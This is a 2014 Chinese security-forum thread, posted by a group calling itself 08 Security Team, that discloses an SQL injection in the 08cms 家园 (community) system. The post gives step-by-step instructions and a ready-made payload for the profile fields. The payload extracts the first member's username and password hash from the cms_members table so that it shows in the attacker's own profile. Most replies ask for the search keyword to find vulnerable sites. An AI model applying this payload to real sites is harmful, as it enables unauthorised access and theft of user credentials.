08cms家园系统注入漏洞

90_ · 发表于 2014-9-5 18:33:47

##########################################
# Title ：08cms家园系统注入漏洞
# Team ：08 Security Team
# Author ：08安全团队
# 首发： 08安全团队
#######################################
这个漏洞在5月份已经审计出来了，现在将漏洞放出来。
注册一个账号会员资料->基本资料查看表单得到自己的 MID
在真实姓名填写 \
头像填写

[AppleScript] 纯文本查看 复制代码

,company=(SELECT CONCAT(mname,0x7c,PASSWORD) FROM cms_members limit 0,1) WHERE MID=231

真实姓名处即可查看

Dr.ls · 发表于 2014-9-5 18:45:02

沙发？

iverson · 发表于 2014-9-5 19:45:05

话说关键字是啥？？？？{:soso_e113:}

phantomer · 发表于 2014-9-5 21:55:56

邪恶 · 发表于 2014-9-5 23:21:49

本帖最后由邪恶于 2014-9-5 23:42 编辑

同关键字是啥》{:soso_e113:}

heihui · 发表于 2014-9-6 11:43:20

碉堡了，赞一个

sea · 发表于 2014-9-7 10:47:22

提示: 作者被禁止或删除内容自动屏蔽

擎天小猪 · 发表于 2014-9-9 21:36:37

赞一个如果代码给的更详细一点就好了

Mapleleaves · 发表于 2014-9-15 09:17:41

我测试过，结果没反应

cuckocucko · 发表于 2014-9-18 13:37:18

关键字是什么啊

sea sea 当前离线积分 2 该用户从未签到	发表于 2014-9-7 10:47:22 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
sea sea 当前离线积分 2 该用户从未签到
	回复支持反对使用道具举报

中国红客联盟 - 08安全团队

08cms家园系统注入漏洞

评分

评分